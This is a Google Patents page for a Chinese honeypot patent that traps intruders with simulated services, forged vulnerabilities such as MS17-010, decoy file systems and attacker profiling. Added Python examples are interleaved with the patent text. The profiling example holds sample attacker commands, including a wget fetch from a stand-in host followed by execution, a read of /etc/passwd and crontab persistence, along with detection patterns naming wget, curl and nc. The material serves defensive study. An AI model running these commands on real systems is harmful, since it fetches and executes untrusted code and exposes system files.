CN115242466A - Intrusion active trapping system and method based on high-simulation virtual environment - Google Patents


Info

Publication number
CN115242466A
Authority
CN
China
Prior art keywords
network service
attacker
file system
module
simulated
Prior art date
Legal status
Pending
Application number
CN202210776795.XA
Other languages
Chinese (zh)
Inventor
郭鑫
陈文�
Current Assignee
Beijing Huasheng Longyuan Technology Co ltd
Original Assignee
Beijing Huasheng Longyuan Technology Co ltd
Priority date
Filing date
Publication date
Application filed by Beijing Huasheng Longyuan Technology Co ltd
Priority to CN202210776795.XA
Publication of CN115242466A
Legal status: Pending

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441 Countermeasures against malicious traffic
    • H04L63/1491 Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computer And Data Communications (AREA)

Abstract

The invention relates to an intrusion active trapping system and method based on a high-simulation virtual environment. The system comprises: a network service simulation module, used for simulating a real network service to obtain a simulated network service; a security vulnerability counterfeiting module, used for counterfeiting security vulnerabilities in the simulated network service so that attackers enter the simulated network service through those vulnerabilities; a file system mirror image module, used for generating a file system in the simulated network service to obtain a virtual file system; an information deception module, used for generating false information in the virtual file system; and an operation control module, used for collecting attack behavior data of an attacker when the attacker enters the simulated network service and operates on the false information, and for building a portrait of the attacker from that data, so that the portrait can be used to trap the attacker's network intrusion behavior. The invention can actively trap the attacker, block and isolate the attacker's attacks on the real network environment, and provide a safe and reliable network environment.

Description

Intrusion active trapping system and method based on high-simulation virtual environment
Technical Field
The invention belongs to the technical field of information security, and particularly relates to an intrusion active trapping system and method based on a high-simulation virtual environment.
Background
Most products of the existing mainstream traditional security protection system are deployed at the network boundary and detect known network attacks by pattern matching against known attack signatures. This approach can effectively monitor common known network attacks such as worms, trojan horses, spyware, botnets and basic computer viruses, but it is of little use against today's Advanced Persistent Threats (APT).
Traditional security defense means have proven effective against medium- and low-level common network threats and non-targeted network attacks, but in the current situation they show shortcomings against some advanced network threats and targeted network attacks, which they find difficult to deal with effectively:
(1) Because effective intranet threat sensing means are lacking, a large amount of repeated security construction is limited to border defense in an attempt to build an unbreakable perimeter, while the security threats of the internal network receive too little attention;
(2) The defense mode is too passive: traditional network security systems, including APT products, are usually deployed on the network side and detect threats from mirrored traffic, but by the time a threat is detected it has already occurred, and even if the response is immediate, the network cannot be trusted during that period;
(3) It is difficult to discover and effectively deal with various novel advanced threats in time: advanced threats are highly concealed, usually carried out with custom tools, unknown vulnerabilities and imitation of normal operations, and are hard for traditional defense means to detect.
Disclosure of Invention
In view of the above, the present invention aims to overcome the defects of the prior art, and provide an intrusion active trapping system and method based on a high-emulation virtual environment, so as to solve the problems in the prior art that the defense mode is too passive, and it is difficult to timely discover and effectively deal with various new high-level threats.
According to a first aspect of embodiments of the present application, there is provided an intrusion active trapping system based on a highly-simulated virtual environment, the system including:
the network service simulation module is used for simulating real network service to obtain simulated network service;
the security vulnerability counterfeiting module is used for counterfeiting security vulnerabilities for the simulated network services so that attackers can enter the simulated network services according to the security vulnerabilities;
the file system mirror module is used for generating a file system in the simulated network service to obtain a virtual file system;
the information spoofing module is used for generating false information in the virtual file system;
and the operation control module is used for collecting attack behavior data of an attacker when the attacker enters the simulated network service and carries out attack behavior operation on the false information, and portrays the attacker according to the attack behavior data so as to utilize the portrayal to trap the network intrusion behavior of the attacker.
Preferably, the network service simulation module is specifically configured to:
simulating real network service by utilizing a honeypot technology to obtain the simulated network service;
and deploying the simulated network service in a real network environment by utilizing port forwarding and port proxy technology.
Preferably, the security vulnerability forging module is specifically configured to:
determining a security vulnerability corresponding to the simulated network service according to the simulated network service based on a preset security vulnerability library;
and deploying the security vulnerability corresponding to the simulated network service in the simulated network service by utilizing a vulnerability rule base.
Preferably, the file system mirroring module is specifically configured to:
and mirroring the real file system by using a docker technology to generate the file system in the simulated network service to obtain a virtual file system.
Preferably, the information spoofing module is specifically configured to:
and simulating content information in a real file system by using a docker technology to generate false information in the virtual file system.
Preferably, the operation control module is specifically configured to:
when an attacker enters the simulated network service and performs attack behavior operation on the false information, acquiring attack behavior data of the attacker;
extracting characteristic elements in the attack behavior data;
and according to the characteristic elements, utilizing a rule matching technology to portray the attacker so as to finish the active trapping of the attacker.
Preferably, the characteristic elements include: IP information, domain name information, intrusion tools, malicious file samples, intrusion instructions, and intrusion behavior.
According to a second aspect of the embodiments of the present application, there is provided an intrusion active trapping method based on a highly simulated virtual environment, which is applied to the above intrusion active trapping system based on a highly simulated virtual environment, the method includes:
simulating real network service by using a network service simulation module to obtain simulated network service;
utilizing a security vulnerability counterfeiting module to forge security vulnerabilities for the simulated network services so that attackers can enter the simulated network services according to the security vulnerabilities;
generating a file system in the simulated network service by using a file system mirror image module to obtain a virtual file system;
generating false information in the virtual file system by using an information spoofing module;
when an attacker enters the simulated network service and performs attack behavior operation on the false information, an operation control module is used for collecting attack behavior data of the attacker, and the attacker is portrayed according to the attack behavior data so as to utilize the portrayal to trap network intrusion behaviors of the attacker.
By adopting the technical scheme, the invention can achieve the following beneficial effects. A real network service is simulated through the network service simulation module to obtain a simulated network service, and security vulnerabilities are forged for it through the security vulnerability forging module, so that an attacker enters the simulated network service through those vulnerabilities; this provides the simulated scene needed to trap the attacker and thereby protects the user's real network environment. A file system is generated in the simulated network service through the file system mirror image module to obtain a virtual file system, and false information is generated in that virtual file system through the information deception module. When the attacker enters the simulated network service and operates on the false information, the operation control module collects the attacker's attack behavior data, builds a portrait of the attacker from it, and uses the portrait to trap the attacker's network intrusion behavior; the attacker can thus be actively trapped, and attacks on the real network environment are blocked and isolated. Through long-term interaction with attackers the system can also portray various types of attackers, so that various novel advanced threats are dealt with, a safe and reliable network environment is provided for users, and the user experience is improved.
Drawings
In order to more clearly illustrate the embodiments of the present invention or the technical solutions in the prior art, the drawings used in the description of the embodiments or the prior art will be briefly described below, it is obvious that the drawings in the following description are only some embodiments of the present invention, and for those skilled in the art, other drawings can be obtained according to the drawings without creative efforts.
FIG. 1 is a block diagram illustrating an intrusion active trap system based on a highly emulated virtual environment in accordance with an exemplary embodiment;
FIG. 2 is a flow diagram illustrating an intrusion active trapping method based on a highly emulated virtual environment, according to an exemplary embodiment;
in the figure, 1 is a network service simulation module, 2 is a security vulnerability falsification module, 3 is a file system mirror image module, 4 is an information deception module, and 5 is an operation control module.
Detailed Description
In order to make the objects, technical solutions and advantages of the present invention more apparent, the technical solutions of the present invention will be described in detail below. It is to be understood that the described embodiments are merely exemplary of the invention, and not restrictive of the full scope of the invention. All other embodiments, which can be derived by a person skilled in the art from the examples given herein without any inventive step, are within the scope of the present invention.
Example one
FIG. 1 is a block diagram illustrating an intrusion active trap system based on a highly emulated virtual environment, as shown in FIG. 1, in accordance with an illustrative embodiment, the system comprising:
the network service simulation module 1 is used for simulating real network service to obtain simulated network service;
the security vulnerability counterfeiting module 2 is used for counterfeiting security vulnerabilities for the simulated network services so that attackers can enter the simulated network services according to the security vulnerabilities;
the file system mirror module 3 is used for generating a file system in the simulated network service to obtain a virtual file system;
the information deception module 4 is used for generating false information in the virtual file system;
and the operation control module 5 is used for collecting attack behavior data of an attacker when the attacker enters the simulated network service and performs attack behavior operation on the false information, and portraying the attacker according to the attack behavior data so as to trap the network intrusion behavior of the attacker by using the portrayal.
It should be noted that the attacker is a network attacker, which is also called an intruder. The network attacker attacks the system and the resources by using the loopholes and security defects existing in the network information system.
In the intrusion active trapping system based on the high-simulation virtual environment, the real network service is simulated through the network service simulation module 1 to obtain the simulated network service, and security vulnerabilities are forged for it through the security vulnerability forging module 2, so that an attacker enters the simulated network service through those vulnerabilities; this provides the simulated scene needed to trap the attacker and protects the user's real network environment. The file system in the simulated network service is generated through the file system mirror image module 3 to obtain a virtual file system, and the false information in the virtual file system is generated through the information deception module 4. When the attacker enters the simulated network service and operates on the false information, the operation control module 5 collects the attacker's attack behavior data, builds a portrait of the attacker from it, and uses the portrait to trap the attacker's network intrusion behavior, so that the attacker is actively trapped and attacks on the real network environment are blocked and isolated. Through long-term interaction with attackers the system can also portray various types of attackers, so that various novel advanced threats are dealt with, a safe and reliable network environment is provided for users, and the user experience is improved.
Further, the network service simulation module 1 is specifically configured to:
simulating real network service by utilizing a honeypot technology to obtain simulated network service;
and deploying the simulated network service in a real network environment by utilizing port forwarding and port proxy technologies.
In some embodiments, the network service simulation module 1 mainly provides normal network service to the outside by simulating a real network service program, and at the same time adds new functions to the simulation program so as to further deceive and control intrusion behavior; for example, the common WWW, FTP and Telnet service programs are simulated, and a certain Trojan horse program can be simulated to create the false impression that the Trojan has been implanted, so that from the attacker's perspective the target looks like an ordinary network asset without security construction.
The network service is the external window of a network and an information system and is the first step in implementing the deception. In the embodiment of the invention, by simulating a real network service program (such as Microsoft Internet Information Server), anyone can access the service through a client program (such as Microsoft Internet Explorer). The advantages are that the program is completely controllable, its return information is easy to customize, it realizes the same functions as the real service program, it records the required log information, it embeds service-level network intrusion detection, and it further forges security vulnerabilities. Furthermore, by providing genuine network services, further deception and control measures are facilitated.
The network service simulation technique is expressed using BNF as follows:
Ss ::= S St
wherein Ss denotes the simulated network service program and St denotes the real network service program.
<S> ::= <FC><F><Log><II><IVF>
wherein FC represents implementation of the same functions and instructions; F represents customization of information such as the flag and version; Log represents the log; II represents the intrusion detection extension interface; IVF represents the security vulnerability forging extension interface.
<Log> ::= <LFL><RRL>
wherein LFL represents a local fake log and RRL represents a remote real log.
It can be understood that the simulated network service is deployed in a real network environment, so that a necessary simulation scene is provided for trapping attackers, the real network environment of a user is protected, the alertness of the attackers is reduced, and a foundation is laid for trapping the attackers.
It should be noted that by simulating various types of real network services with honeypot technology, simulated network services are obtained; each simulated network service may be called a honeypot, an environment composed of several honeypots is called a honeynet, and the honeynet is the highly simulated virtual environment. In the honeynet environment, diverse hosts and network structures are only the basic building blocks; what matters most is a real service scene, comprising a real host environment, a real service network, real service software, simulated service data and simulated service activity, which together form a 'service scene' that is completely real and indistinguishable from a genuine one to the attacker. The honeynet simulation function provides the various simulation scene resources needed to trap attackers through the combined use of various virtualization technologies, including operating systems, application systems, network equipment and the like.
The corresponding services in the honeypots are opened, and the services are 'scattered' in the real network environment in a node mode. The attacker obtains the service in the real network through the detection behavior, and then the attacker attacks the service of the honeynet and leads to the security vulnerability falsification module 2. The honeypot is equivalent to a real host, and the services are equivalent to various types of services (for example, smb service) opened in the real host.
The honeypot technology, the port forwarding technology, and the port proxy technology, which are involved in the embodiments of the present invention, are well known to those skilled in the art, and therefore, the specific implementation manner thereof is not described too much.
Further, the security vulnerability falsification module 2 is specifically configured to:
determining a security vulnerability corresponding to the simulated network service according to the simulated network service based on a preset security vulnerability library;
and deploying the security vulnerability corresponding to the simulated network service in the simulated network service by utilizing the vulnerability rule base.
The embodiment of the invention does not limit the preset security vulnerability library, which can be set by those skilled in the art according to expert experience, experimental data and the like. The "vulnerability rule base" approach involved in the embodiment of the present invention is well known to those skilled in the art, and therefore its specific implementation is not described in detail.
For example, if the simulated network service is version V1.0 of the SMB service, the security vulnerability corresponding to it is searched for in the preset security vulnerability library, and it is determined to be the MS17-010 vulnerability; the MS17-010 vulnerability is then deployed in the simulated network service using the vulnerability rule base, so that an attacker may gain access to the simulated network service through MS17-010. If the simulated network service is instead version V2.0 of the SMB service, it cannot be accessed through MS17-010. Here, a vulnerability refers to a publicly disclosed "CVE vulnerability" (the MS17-010 vulnerability mentioned above is also catalogued under the number CVE-2017-0143).
It can be understood that the security vulnerability falsification module 2 further forges security vulnerabilities in the simulated network service to arouse the attacker's interest, so that the attacker's scans of the forged vulnerability, the attack itself and the attack results are completely consistent with the behavior of the real vulnerability; the attacker is thus deceived into believing they have obtained the highest privileges on the network asset, which further enables interaction with the attacker.
It should be noted that a security vulnerability is a prerequisite for a network attack. Security vulnerability forgery is the second step of the deception and depends on deceiving network scanners and attack tools: deceiving a network scanner makes the attacker believe that security vulnerabilities exist in the network and information system, and deceiving the attack tool makes the attacker believe that they have successfully exploited the vulnerability to get into the host or network.
The embodiment of the invention realizes whole-process deception of vulnerability attacks by forging security vulnerabilities. The method can simulate the whole process of attacking a vulnerability, so that the vulnerability's observable behavior is indistinguishable from the real one, while the intrusion behavior is well controlled and redirected into the deception environment. Safety is ensured while the degree of interaction and deception is greatly improved.
In some embodiments, the network scanner obtains the security vulnerabilities in a request/reply manner based on feature matching techniques. According to the request information of the network scanner, response information of the existence of the loophole is returned to the network scanner, and the purpose of cheating can be achieved. Because the scanning information of different network scanners and the characteristic information of judging the existence of a vulnerability may be different, different response information needs to be customized according to different network scanners. And establishing a network scanner deception database, and maintaining the scanning characteristics and response characteristic information of different network scanners aiming at different security vulnerabilities.
The security vulnerability falsification technique is expressed using BNF as follows:
Vf ::= F Vt
where Vf represents a fake security hole and Vt represents a real security hole.
<F>::=<DS><DA><DR>
Wherein DS represents a spoof scanner; DA represents a spoofing attack tool; DR represents spoofing of attack results.
<DS>::=<RSI><VSL>
Wherein RSI represents scanner request information interception; the VSL represents a vulnerability signature table.
<VSL>::=<RSSL><ASSL>
Wherein RSSL represents a scanner request message characteristic table, ASSL represents a server response message characteristic table.
<DA>::=<AII><ASL>
Wherein, AII represents attack information interception; ASL denotes an attack signature table.
<ASL>::=<ASL><RIAL>
Wherein ASL represents an attack characteristic table, and RIAL represents an attack result information table.
<RIAL>::=<SIA><FIA>
Wherein SIA represents attack success information, and FIA represents attack failure information.
<DR>::=<GP><DOS>
Wherein GP represents acquisition right; DOS denotes denial of service.
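As an added illustration (not code from the patent), the following Python model shows how the <S> and <DS> grammars above fit together for the SMB example on this page: the service answers with a customized banner, a scanner request matched in the vulnerability signature table (<RSSL>/<ASSL>) receives the forged MS17-010 response only when the simulated version is listed as vulnerable in the preset library, and every exchange is written to a local fake log and a remote real log. All request and response strings, the version numbers and the signature table are constructed placeholders, not real SMB protocol data.

```python
"""Toy model of the network service simulation (<S>) and scanner deception
(<DS>) grammars on this page. Illustrative only; not the patent's code.
Every request/response string, version and signature below is constructed."""
from dataclasses import dataclass, field

# <VSL> ::= <RSSL><ASSL>: scanner request signature -> (probed vulnerability,
# forged server response). Constructed placeholders, not real SMB bytes.
VULN_SIGNATURES = {
    "PROBE:smb-trans2-status": ("MS17-010", "REPLY:trans2-status-vulnerable"),
}

# Preset security vulnerability library: which forged vulnerabilities a given
# simulated service version exposes (the page's SMB V1.0 / V2.0 example).
VULN_LIBRARY = {
    ("smb", "1.0"): {"MS17-010"},
    ("smb", "2.0"): set(),
}


@dataclass
class SimulatedService:
    name: str
    version: str
    banner: str  # <F>: customised flag/version string shown to clients
    local_fake_log: list = field(default_factory=list)   # <LFL>: attacker-visible
    remote_real_log: list = field(default_factory=list)  # <RRL>: full, off-host
    detections: list = field(default_factory=list)       # <II>: detection hook

    def _log(self, src, request, response, note):
        # The fake log only ever shows a bland connection line; the real log
        # keeps the full exchange and the reason for the response.
        self.local_fake_log.append(f"{src} connected")
        self.remote_real_log.append(
            {"src": src, "req": request, "resp": response, "note": note})

    def _vulnerable_to(self, vuln):
        return vuln in VULN_LIBRARY.get((self.name, self.version), set())

    def handle(self, src: str, request: str) -> str:
        """Answer one client request the way the simulated service would."""
        if request == "HELLO":
            # <FC>: same behaviour as the real service, banner customised (<F>)
            self._log(src, request, self.banner, "banner")
            return self.banner
        if request in VULN_SIGNATURES:
            # <RSI>: scanner request intercepted and matched against <RSSL>
            vuln, forged = VULN_SIGNATURES[request]
            self.detections.append((src, "scan", vuln))
            if self._vulnerable_to(vuln):
                # <IVF>: forged vulnerability, answer with the <ASSL> response
                self._log(src, request, forged, f"forged {vuln} shown")
                return forged
            resp = "REPLY:not-vulnerable"
            self._log(src, request, resp, f"{vuln} not forged for {self.version}")
            return resp
        resp = "ERROR:unknown-command"
        self._log(src, request, resp, "unknown request")
        return resp


def demo():
    """Run the page's SMB example: V1.0 shows MS17-010, V2.0 does not."""
    v1 = SimulatedService("smb", "1.0", "SMB/1.0 honeynet-host")
    v2 = SimulatedService("smb", "2.0", "SMB/2.0 honeynet-host")
    src = "203.0.113.5"  # constructed scanner address
    return {
        "v1": v1.handle(src, "PROBE:smb-trans2-status"),
        "v2": v2.handle(src, "PROBE:smb-trans2-status"),
        "v1_real_log": v1.remote_real_log,
        "v1_fake_log": v1.local_fake_log,
    }
```

The split between the two logs is the point to notice: the attacker-visible log never reveals that the response was forged, while the remote log records the matched signature and why it was answered that way.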
Further, the file system mirroring module 3 is specifically configured to:
and mirroring the real file system by using a docker technology to generate a file system in the simulated network service to obtain a virtual file system.
In some embodiments, a docker technology is used to store file frames of different systems in a docker server, and when an attacker attacks different systems, the file system frames of the corresponding systems are extracted from a docker library for induction.
It can be understood that the file system is the final target of many attacks: after an attacker compromises the decoy host, they perform file operations such as creating, deleting, modifying and reading files. To protect the host's file system from damage by attackers, without preventing attackers from performing file access operations, file-system-level deception must be implemented. In the embodiment of the invention, the virtual file system, obtained by the file system mirroring module 3 mirroring the real file system using one directory of the real host's file system, has the same directory structure, system files, library files and so on as the real file system, so the attacker is shown the illusion of a complete file system.
The file system mirroring technique is represented using BNF as follows:
FSm ::= M FSt
where FSm denotes the mirrored file system and FSt denotes the real file system.
<M>::=<BtoBC>
Where BtoBC represents a byte-to-byte copy.
It should be noted that the "mirror real file system using docker technology" manner referred to in the embodiments of the present invention is well known to those skilled in the art, and therefore, a specific implementation manner thereof is not described too much.
Further, the information spoofing module 4 is specifically configured to:
and simulating content information in a real file system by using a docker technology to generate false information in the virtual file system.
It can be understood that the information spoofing module 4 provides deceptive information according to the specific application requirements and the object of deception, making the host appear to an attacker to be an important server. Moreover, since the simulated network service is real, the deceptive information can be flexibly customized for different types of network service and is very easy to update, so that the attacker can be thoroughly deceived.
The spoofing technique is expressed using BNF as follows:
Id ::= D It
where Id represents the deceptive information and It represents the true information.
<D>::=<SI><NC><IC>
Wherein, SI represents the simulation network service interface, NC represents the network and server attribute, and IC represents the information compilation.
It should be noted that, the manner of "simulating content information in a real file system by using docker technology" in the embodiment of the present invention is well known to those skilled in the art, and therefore, a specific implementation manner thereof is not described in detail.
Further, the operation control module 5 is specifically configured to:
when an attacker enters the simulated network service and performs attack behavior operation on the false information, acquiring attack behavior data of the attacker;
extracting characteristic elements in the attack behavior data;
according to the characteristic elements, an attacker is portrayed by utilizing a rule matching technology so as to finish active trapping of the attacker;
wherein, the characteristic element includes: IP information, domain name information, intrusion tools, malicious file samples, intrusion instructions, and intrusion behavior.
In some embodiments, the malicious file samples include viruses, trojans, worms and the like.
In some other alternative embodiments, the operation control module 5 extracts the IP information, domain name information, intrusion tools, malicious file samples, intrusion instructions, and characteristic elements of intrusion behavior from the collected attack behavior data, and performs comprehensive research and judgment through a built-in "attacker fingerprint" library and a threat information library.
Specifically, the attacker can be, but is not limited to, profiled by using the Rete algorithm in the rule matching technique. It should be noted that the "rule matching technology" manner involved in the embodiments of the present invention is well known to those skilled in the art, and therefore, the specific implementation manner thereof is not described too much.
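As an added example (not the patent's code), the following Python extracts the characteristic elements listed above (IP information, domain names, intrusion tools, malicious file samples, intrusion instructions and intrusion behavior) from constructed honeypot event records, then matches them against a small constructed "attacker fingerprint" library and threat information library to produce a portrait. The rule matching is a plain all-conditions check rather than a Rete network; the events, patterns, fingerprints and threat entries are all constructed.

```python
"""Feature extraction and rule-matched attacker portrait, modelling the
profiling step of the operation control module. Illustrative only; not the
patent's code. Events, fingerprint rules and threat information are constructed."""
import re

# Constructed attack behaviour records as the honeypot would collect them.
SAMPLE_EVENTS = [
    {"src": "198.51.100.7", "type": "cmd",
     "data": "wget http://staging.example.test/x.sh -O /tmp/x.sh"},
    {"src": "198.51.100.7", "type": "cmd", "data": "chmod +x /tmp/x.sh && /tmp/x.sh"},
    {"src": "198.51.100.7", "type": "file", "data": "/tmp/x.sh",
     "sha256": "CONSTRUCTED-HASH-PLACEHOLDER"},
    {"src": "198.51.100.7", "type": "cmd", "data": "cat /etc/passwd"},
    {"src": "198.51.100.7", "type": "cmd", "data": "crontab -l"},
]

TOOL_WORDS = {"wget", "curl", "nc", "ncat", "chmod", "crontab"}
DOMAIN_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Intrusion behaviour tags derived from instructions (constructed patterns).
BEHAVIOUR_PATTERNS = [
    ("download", re.compile(r"\b(wget|curl)\b")),
    ("execute", re.compile(r"chmod \+x|&&\s*/tmp/\S+")),
    ("recon", re.compile(r"cat /etc/passwd|\b(uname|whoami|id)\b")),
    ("persistence", re.compile(r"\bcrontab\b|\.bashrc|/etc/rc\.local")),
]
# Constructed "attacker fingerprint" library: label -> behaviours required.
FINGERPRINT_LIBRARY = [
    ("dropper-and-run", {"download", "execute"}),
    ("host-recon", {"recon"}),
    ("persistence-seeker", {"persistence"}),
]
# Constructed threat information library keyed by domain.
THREAT_INFO = {"staging.example.test": "listed malware staging host (constructed)"}


def extract_features(events):
    """Pull the page's characteristic elements out of raw event records."""
    f = {"ips": set(), "domains": set(), "tools": set(),
         "samples": [], "instructions": [], "behaviours": set()}
    for ev in events:
        f["ips"].add(ev["src"])
        if ev["type"] == "cmd":
            cmd = ev["data"]
            f["instructions"].append(cmd)
            f["domains"].update(DOMAIN_RE.findall(cmd))
            f["tools"].update(w for w in re.findall(r"[A-Za-z0-9_.-]+", cmd)
                              if w in TOOL_WORDS)
            for tag, pattern in BEHAVIOUR_PATTERNS:
                if pattern.search(cmd):
                    f["behaviours"].add(tag)
        elif ev["type"] == "file":
            f["samples"].append((ev["data"], ev.get("sha256")))
    return f


def portray(events):
    """Rule matching: a fingerprint fires when all its behaviours were seen."""
    f = extract_features(events)
    labels = [name for name, needed in FINGERPRINT_LIBRARY if needed <= f["behaviours"]]
    intel = {d: THREAT_INFO[d] for d in f["domains"] if d in THREAT_INFO}
    return {"labels": labels, "features": f, "threat_intel": intel}
```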
In some embodiments, the operation control module 5 collects an attacker's attack behavior data by making the necessary modifications to the operating system kernel, or by intercepting system calls, so as to monitor and control the intrusion behavior. The system that simulates the compromise of the target effectively monitors the attacker's operations by recording, reading and returning the attacker's data packets as they pass through the honeypot system, and displays them at the front end using the honeynet's own encryption mode. This is a precondition for establishing a medium- or high-interaction deception environment; otherwise only a shallow, low-interaction deception environment is available. Kernel-level control confines the attacker's operations to specific objects in a specific logical environment, thereby improving security.
It can be understood that when an attacker enters the deception environment through the simulated network services and the counterfeit security vulnerabilities, they may perform actions such as modifying logs or installing a backdoor program. It must be ensured that attackers are allowed to perform some operations (for example, copying or deleting files or file contents) while their activity cannot compromise the security of the real host or network, thereby enhancing the authenticity of the deception system. Through long-term interaction with the attacker, various types of attackers are portrayed, various novel advanced threats are dealt with, a safe and reliable network environment is provided for users, and the user experience is improved.
The operating system kernel interacts directly with the hardware, and the act of interacting with the kernel occurs in the user space (e.g., the user initiates a process or instruction execution). Almost all applications (e.g., WWW, DNS, and FRP) operate in user space. Therefore, interception of kernel interaction behaviors by instructions or applications is realized in a user space, and intrusion behaviors can be well controlled.
The operational control is expressed in BNF as follows:
<OPc> ::= <C> <OPt>
where OPc is the controlled operation and OPt is the real operation.
<C> ::= <SCI> | <SCR>
where SCI is system call interception and SCR is system call replacement.
<SCI> ::= <CG> <OPI>
where CG is instruction information acquisition and OPI is operation interception.
<OPI> ::= <OPR> <OPF> <Alert> <Log>
where OPR is operation redirection, OPF is operation filtering, Alert is the alarm, and Log is the log.
<Log> ::= <LFL> <RRL>
where LFL is the local forged log and RRL is the remote real log.
<SCR> ::= <CG> <SIH> <SPH> <Alert> <Log>
where CG is instruction information acquisition, SIH is sensitive information hiding, SPH is system process hiding, Alert is the alarm, and Log is the log as defined above.
<SIH> ::= <IfS> <ItH>
where IfS is counterfeit information display and ItH is real information hiding.
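The following is an added example, not code from the patent, that maps the BNF productions above onto a small in-memory policy engine: OPc ::= C OPt is realised by choosing either the interception path (SCI: redirect, filter, alert, log) or the replacement path (SCR: counterfeit display, real-information hiding, process hiding, alert, log), and every operation produces both a local forged log entry (LFL) and a remote real log entry (RRL). All paths, process names, file contents and the mirror directory are constructed sample values; a real deployment would receive the captured operation from a ptrace, seccomp or preloaded-library hook rather than from an Op object.

```python
"""In-memory model of the OPc ::= C OPt operation-control pipeline (added example)."""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed sample state of the decoy host. REAL_FS holds the values the attacker
# must never see (ItH); FAKE_FS holds the counterfeit content shown instead (IfS).
REAL_FS: Dict[str, str] = {
    "/etc/shadow": "root:$6$REALHASH-PLACEHOLDER:19500:0:99999:7:::",
    "/etc/motd": "Welcome to build-server-01",
}
FAKE_FS: Dict[str, str] = {
    "/etc/shadow": "root:$6$DECOYHASH-PLACEHOLDER:19300:0:99999:7:::",
}
REAL_PROCS = ["sshd", "nginx", "honeynet-monitor", "cron"]
HIDDEN_PROCS = {"honeynet-monitor"}       # SPH: monitoring processes hidden from process listings
SENSITIVE_PATHS = set(FAKE_FS)            # reads of these go through SCR instead of SCI
MIRROR_ROOT = "/var/honeypot/mirror"      # assumed root of the mirrored virtual file system
SINK_OPS = {"write", "unlink", "chmod"}   # destructive operations redirected into the mirror (OPR)
FILTERED_OPS = {"connect"}                # egress from the decoy is filtered (OPF)


@dataclass
class Op:
    """A real operation OPt as captured by CG (instruction information acquisition)."""
    name: str
    args: Tuple[str, ...]
    pid: int


@dataclass
class Controlled:
    """The controlled operation OPc: what the attacker sees plus what the defender records."""
    action: str                                                 # allow | redirect | filter | replace
    result: object = None                                       # value returned to the attacker
    alerts: List[str] = field(default_factory=list)             # <Alert>
    local_forged_log: List[str] = field(default_factory=list)   # <LFL>, readable inside the decoy
    remote_real_log: List[str] = field(default_factory=list)    # <RRL>, shipped off-host


def capture(op: Op) -> str:
    """CG: serialise the captured instruction for logging and later profiling."""
    return f"pid={op.pid} " + " ".join((op.name,) + op.args)


def write_logs(c: Controlled, op: Op) -> None:
    """<Log> ::= <LFL><RRL>: the local log claims success so the attacker keeps
    interacting; the remote log records what really happened."""
    c.local_forged_log.append(" ".join((op.name,) + op.args) + ": ok")
    c.remote_real_log.append(f"{capture(op)} -> {c.action}")


def intercept(op: Op) -> Controlled:
    """<SCI> ::= <CG><OPI>, with <OPI> ::= <OPR><OPF><Alert><Log>."""
    c = Controlled(action="allow")
    if op.name in SINK_OPS:                                    # OPR: operation redirection
        c.action, c.result = "redirect", MIRROR_ROOT + op.args[0]
        c.alerts.append(f"ALERT {op.name} on {op.args[0]} redirected to mirror")
    elif op.name in FILTERED_OPS:                              # OPF: operation filtering
        c.action, c.result = "filter", None
        c.alerts.append(f"ALERT outbound {op.name} to {op.args[0]} dropped")
    elif op.name == "open":                                    # harmless read: pass through
        c.result = REAL_FS.get(op.args[0])
    write_logs(c, op)
    return c


def replace(op: Op) -> Controlled:
    """<SCR> ::= <CG><SIH><SPH><Alert><Log>, with <SIH> ::= <IfS><ItH>."""
    c = Controlled(action="replace")
    if op.name == "open":
        c.result = FAKE_FS[op.args[0]]                         # IfS shown; the REAL_FS value never leaves
        c.alerts.append(f"ALERT sensitive read of {op.args[0]} served decoy content")
    else:                                                      # ps: SPH hides the monitor processes
        c.result = [p for p in REAL_PROCS if p not in HIDDEN_PROCS]
    write_logs(c, op)
    return c


def control(op: Op) -> Controlled:
    """OPc ::= C OPt: select SCR for sensitive reads and process listings, SCI otherwise."""
    if op.name == "ps" or (op.name == "open" and op.args[0] in SENSITIVE_PATHS):
        return replace(op)
    return intercept(op)


def run_session(ops: List[Op]) -> Dict[str, object]:
    """Control a whole attacker session and summarise what the defender learned."""
    results = [control(op) for op in ops]
    return {
        "alerts": [a for r in results for a in r.alerts],
        "remote_real_log": [line for r in results for line in r.remote_real_log],
        "leaked_real_secret": any(r.result == REAL_FS["/etc/shadow"] for r in results),
    }


if __name__ == "__main__":
    session = [Op("open", ("/etc/shadow",), 4242), Op("ps", (), 4242),
               Op("unlink", ("/var/log/auth.log",), 4242),
               Op("connect", ("198.51.100.9:4444",), 4242)]
    for line in run_session(session)["remote_real_log"]:
        print(line)
```

The split between SCI and SCR follows the grammar: destructive and outbound operations are intercepted (redirected into the mirror or filtered), while reads of sensitive objects and process listings are replaced so that the attacker sees counterfeit data and never the real values, which is what the two log streams make verifiable after the fact.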
According to the intrusion active trapping system based on the high-simulation virtual environment, the network service simulation module 1 simulates a real network service to obtain a simulated network service, and the security vulnerability forging module 2 forges a security vulnerability for the simulated network service so that an attacker enters the simulated network service through that vulnerability; this provides the simulation scene needed to trap the attacker and protects the user's real network environment. The file system mirror module 3 generates the file system in the simulated network service to obtain a virtual file system, and the information deception module 4 generates false information in the virtual file system. When the attacker enters the simulated network service and performs attack operations on the false information, the operation control module 5 collects the attacker's attack behavior data and portrays the attacker from it, and the portrait is used to trap the attacker's network intrusion behavior. The attacker can thus be actively trapped, and the attack on the real network environment is blocked and isolated. By interacting with attackers over a long period the system can also portray various types of attackers, so that various new advanced threats are dealt with, a safe and reliable network environment is provided for users, and the user experience is improved.
Example two
In order to implement the above intrusion active trapping system based on the high-simulation virtual environment cooperatively, an embodiment of the present invention provides an intrusion active trapping method based on the high-simulation virtual environment, which is applied to the above intrusion active trapping system based on the high-simulation virtual environment, and the method can be used for a terminal, but is not limited to the terminal, and includes the following steps:
step 101: simulating real network service by using a network service simulation module to obtain simulated network service;
